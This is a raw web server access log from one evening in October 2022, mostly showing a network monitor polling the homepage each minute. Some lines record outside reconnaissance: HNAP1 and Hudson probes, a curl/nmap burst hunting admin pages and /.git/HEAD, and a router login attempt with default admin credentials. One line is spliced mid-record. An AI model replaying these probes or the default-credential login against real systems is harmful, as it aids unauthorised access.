212.91.246.72 - - [03/Oct/2022:19:31:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:32:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:33:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.107.111.53 - - [03/Oct/2022:19:34:09 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2022:19:34:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:35:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:36:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:37:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:38:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.58.124.134 - - [03/Oct/2022:19:39:33 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [03/Oct/2022:19:39:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
117.216.0.143 - - [03/Oct/2022:19:40:09 +0200] "POST /HNAP1/ HTTP/1.0" 404 311 "-" "-"
212.91.246.72 - - [03/Oct/2022:19:40:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:41:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:42:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:43:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
143.198.72.211 - - [03/Oct/2022:19:44:20 +0200] "\x16\x03\x01" 501 318 "-" "-"
143.198.72.211 - - [03/Oct/2022:19:44:20 +0200] "\x16\x03\x01" 501 318 "-" "-"
143.198.72.211 - - [03/Oct/2022:19:44:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Oct/2022:19:44:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:45:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.136.225.35 - - [03/Oct/2022:19:46:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
212.91.246.72 - - [03/Oct/2022:19:46:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:47:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:48:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:49:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:50:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
154.209.125.71 - - [03/Oct/2022:19:50:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
212.91.246.72 - - [03/Oct/2022:19:51:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:52:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:53:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:54:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:55:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:56:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:57:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:58:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:19:59:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:00:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.56.150.102 - - [03/Oct/2022:20:00:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
149.56.150.102 - - [03/Oct/2022:20:00:58 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
149.56.150.102 - - [03/Oct/2022:20:00:58 +0200] "GET /sitemap.xml HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
149.56.150.102 - - [03/Oct/2022:20:00:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
149.56.150.102 - - [03/Oct/2022:20:00:59 +0200] "GET /ads.txt HTTP/1.1" 404 324 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
149.56.150.102 - - [03/Oct/2022:20:01:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 5.1.1; SM-G925F Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.94 Mobile Safari/537.36"
183.136.225.35 - - [03/Oct/2022:20:01:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
144.217.135.176 - - [03/Oct/2022:20:01:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
212.91.246.72 - - [03/Oct/2022:20:01:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:02:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.136.225.35 - - [03/Oct/2022:20:03:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.35 - - [03/Oct/2022:20:03:10 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.35 - - [03/Oct/2022:20:03:11 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
212.91.246.72 - - [03/Oct/2022:20:03:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:04:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:05:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.216.71.180 - - [03/Oct/2022:20:06:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.216.71.180 - - [03/Oct/2022:20:06:11 +0200] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
212.91.246.72 - - [03/Oct/2022:20:06:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:07:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:08:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:09:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:10:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:11:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:12:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:13:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
111.251.195.187 - - [03/Oct/2022:20:14:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [03/Oct/2022:20:14:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:15:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:16:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.136.225.35 - - [03/Oct/2022:20:17:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.35 - - [03/Oct/2022:20:17:26 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.35 - - [03/Oct/2022:20:17:27 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
212.91.246.72 - - [03/Oct/2022:20:17:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
190.78.87.134 - - [03/Oct/2022:20:17:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
46.19.141.122 - - [03/Oct/2022:20:17:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
46.19.141.122 - - [03/Oct/2022:20:17:59 +0200] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
3.86.205.245 - - [03/Oct/2022:20:18:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/58.0.3030.90 Safari/537.32"
212.91.246.72 - - [03/Oct/2022:20:18:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:19:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:20:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:21:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:22:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:23:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.227.44.194 - - [03/Oct/2022:20:23:49 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.227.44.194 - - [03/Oct/2022:20:23:50 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.227.44.194 - - [03/Oct/2022:20:23:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Oct/2022:20:24:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:25:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:26:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:27:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
128.199.96.50 - - [03/Oct/2022:20:28:21 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2022:20:28:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
128.199.96.50 - - [03/Oct/2022:20:29:25 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
128.199.96.50 - - [03/Oct/2022:20:29:25 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
201.238.154.177 - - [03/Oct/2022:20:29:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [03/Oct/2022:20:29:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:30:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:31:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:32:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:33:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:34:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.74.204.123 - - [03/Oct/2022:20:35:12 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
109.74.204.123 - - [03/Oct/2022:20:35:12 +0200] "POST /scripts/WPnBr.dll HTTP/1.1" 404 322 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:12 +0200] "POST /sdk HTTP/1.1" 404 308 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:12 +0200] "GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 1229 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:12 +0200] "GET /nmaplowercheck1664822112 HTTP/1.1" 404 329 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:12 +0200] "GET /CSS/Miniweb.css HTTP/1.1" 404 320 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:12 +0200] "GET /hk9P HTTP/1.1" 404 309 "-" "curl/7.54.0" academyforinternetresearch.org - - [03/Oct/2022:20:35:12 +0200] "GET /server-status HTTP/1.1" 403 322 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:12 +0200] "GET /Portal0000.htm HTTP/1.1" 404 319 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:12 +0200] "GET /pools/default/buckets HTTP/1.1" 404 326 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:12 +0200] "GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1" 200 1229 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:12 +0200] "GET /HNAP1 HTTP/1.1" 404 310 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:12 +0200] "GET /Portal/Portal.mwsl HTTP/1.1" 404 323 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:12 +0200] "HEAD / HTTP/1.1" 200 - "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:12 +0200] "GET /__Additional HTTP/1.1" 404 317 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:13 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
109.74.204.123 - - [03/Oct/2022:20:35:13 +0200] "GET /pools HTTP/1.1" 404 310 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:13 +0200] "GET /docs/cplugError.html/ HTTP/1.1" 404 326 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:13 +0200] "GET /.git/HEAD HTTP/1.1" 404 314 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:13 +0200] "GET /start.html HTTP/1.1" 404 315 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:13 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:13 +0200] "GET /start.cfm HTTP/1.1" 404 314 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:13 +0200] "GET /menu.jhtml HTTP/1.1" 404 315 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:14 +0200] "GET /default.jhtml HTTP/1.1" 404 318 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:14 +0200] "GET /menu.jsa HTTP/1.1" 404 313 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:14 +0200] "GET /home.jsp HTTP/1.1" 404 313 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:14 +0200] "GET /menu.cgi HTTP/1.1" 404 313 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:14 +0200] "GET /localstart.cfm HTTP/1.1" 404 319 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:14 +0200] "GET /main.html HTTP/1.1" 404 314 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:14 +0200] "GET /inicio.asp HTTP/1.1" 404 315 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:15 +0200] "GET /indice.cfm HTTP/1.1" 404 315 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:15 +0200] "GET /menu.pl HTTP/1.1" 404 312 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:15 +0200] "GET /home.jsa HTTP/1.1" 404 313 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:15 +0200] "GET /readme.txt HTTP/1.1" 404 315 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:15 +0200] "GET /admin.shtml HTTP/1.1" 404 316 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:15 +0200] "GET /admin.pl HTTP/1.1" 404 313 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:16 +0200] "GET /admin.php HTTP/1.1" 404 314 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:16 +0200] "GET /indice.php HTTP/1.1" 404 315 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:16 +0200] "GET /index.php HTTP/1.1" 404 314 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:16 +0200] "GET /menu.cfm HTTP/1.1" 404 313 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:16 +0200] "GET /localstart.cgi HTTP/1.1" 404 319 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:16 +0200] "GET /inicio.cfm HTTP/1.1" 404 315 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:16 +0200] "GET /admin.jsa HTTP/1.1" 404 314 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:17 +0200] "GET /admin.jhtml HTTP/1.1" 404 316 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:17 +0200] "GET /start.jhtml HTTP/1.1" 404 316 "-" "curl/7.54.0"
109.74.204.123 - - [03/Oct/2022:20:35:17 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
212.91.246.72 - - [03/Oct/2022:20:35:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:36:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.142.125.213 - - [03/Oct/2022:20:37:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.213 - - [03/Oct/2022:20:37:08 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.213 - - [03/Oct/2022:20:37:08 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [03/Oct/2022:20:37:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
128.199.96.50 - - [03/Oct/2022:20:38:19 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
128.199.96.50 - - [03/Oct/2022:20:38:31 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2022:20:38:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.208.116 - - [03/Oct/2022:20:39:15 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
192.241.208.116 - - [03/Oct/2022:20:39:23 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Oct/2022:20:39:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.208.116 - - [03/Oct/2022:20:39:47 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
115.61.55.137 - - [03/Oct/2022:20:40:05 +0200] "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" 404 324 "-" "-"
212.91.246.72 - - [03/Oct/2022:20:40:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.89.177.63 - - [03/Oct/2022:20:41:19 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
192.241.208.116 - - [03/Oct/2022:20:41:35 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
192.241.208.116 - - [03/Oct/2022:20:41:35 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
192.241.208.116 - - [03/Oct/2022:20:41:37 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
192.241.208.116 - - [03/Oct/2022:20:41:39 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Oct/2022:20:41:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.208.116 - - [03/Oct/2022:20:41:53 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
192.241.208.116 - - [03/Oct/2022:20:42:06 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
192.241.208.116 - - [03/Oct/2022:20:42:08 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Oct/2022:20:42:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2022:20:43:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
128.199.96.50 - - [03/Oct/2022:20:43:53 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
128.199.96.50 - - [03/Oct/2022:20:44:25 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2022:20:44:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
128.199.96.50 - - [03/Oct/2022:20:44:53 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2022:20:45:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
